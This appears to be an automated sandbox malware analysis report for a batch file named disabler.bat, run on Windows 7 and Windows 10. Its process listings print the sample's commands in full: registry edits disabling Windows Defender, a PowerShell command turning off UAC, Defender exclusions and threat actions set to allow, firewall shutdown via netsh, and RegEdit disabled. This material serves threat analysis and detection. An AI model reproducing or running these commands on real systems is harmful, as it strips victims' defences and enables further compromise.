Malware Analysis Report

2025-08-10 11:47

Sample ID 250108-fv3p8avrds
Target disabler.bat
SHA256 c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
Tags
evasion execution persistence privilege_escalation trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

Threat Level: Known bad

The file disabler.bat was found to be: Known bad.

Malicious Activity Summary

evasion execution persistence privilege_escalation trojan

UAC bypass

Contains code to disable Windows Defender

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Disables RegEdit via registry modification

Event Triggered Execution: Netsh Helper DLL

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-01-08 05:12

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-08 05:12

Reported

2025-01-08 05:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2404 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2404 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2404 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2764 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2764 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2764 wrote to memory of 2768 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2404 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2404 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2404 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -PUAProtection Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

Network

N/A

Files

memory/2852-4-0x0000000002D00000-0x0000000002D80000-memory.dmp

memory/2852-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2852-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ba82edd25c65cb9256d9250fdc1ef4df
SHA1 dc079b101d43a9f11f4dc0db060aefbe9b05c05e
SHA256 915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08
SHA512 d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433

memory/2612-12-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2612-13-0x0000000001D90000-0x0000000001D98000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-08 05:12

Reported

2025-01-08 05:15

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2628 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2628 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3080 wrote to memory of 488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3080 wrote to memory of 488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2628 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 3256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2628 wrote to memory of 3256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2628 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -PUAProtection Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 133.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 8.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/2944-0-0x00007FFB07753000-0x00007FFB07755000-memory.dmp

memory/2944-1-0x000001C17F630000-0x000001C17F652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwmipase.xru.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2944-11-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

memory/2944-12-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

memory/2944-15-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 190cc2feb6fbf6a6143f296ebe043de5
SHA1 8fa72a99c46ed77b602476c85ca2d8ea251b22fb
SHA256 4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
SHA512 94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7becdab2ad9e7d9ddc64007adfe686c2
SHA1 fef71543e091354d4de3a9f7bee4ccb0ee42af4f
SHA256 783470403ea42fc708f0f80a3fa5c88be41dcd378fa0d75446d39beb3275e662
SHA512 1525f9b28f5b76851e50ac904a442f6a1f6f266efabb5b9e1a69049c62ba10fe2d6976cbe9f09a1811fa737838a12665f77e860f569eba317b8344b26d318a44

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 929c856a9f5f4fd187b9b324e39be583
SHA1 b5d74d5b632f2b0d892c0b763f7f9c36f8677fec
SHA256 67fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e
SHA512 5746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a1e249212d4af8ee7f335a5dfd075ba
SHA1 8ab2019e5d1376124bd79b822b9b1d4a794de076
SHA256 046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa
SHA512 8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd19bc9cb94a09e301fed47789e3e465
SHA1 999814ece758478a6912e0cf61eccb2135606931
SHA256 3eea57e35145bce1c62f119586b5cd7e8a0c140fb1ca5ee40db5784edeba7c1a
SHA512 ad3bdde4ddbf94e136207900965c0c631b338895066205dff83ec2205f2ec11879b1e64ea67fe1e8145238d402177328cb8115494a0dce9400fc076836f29fcb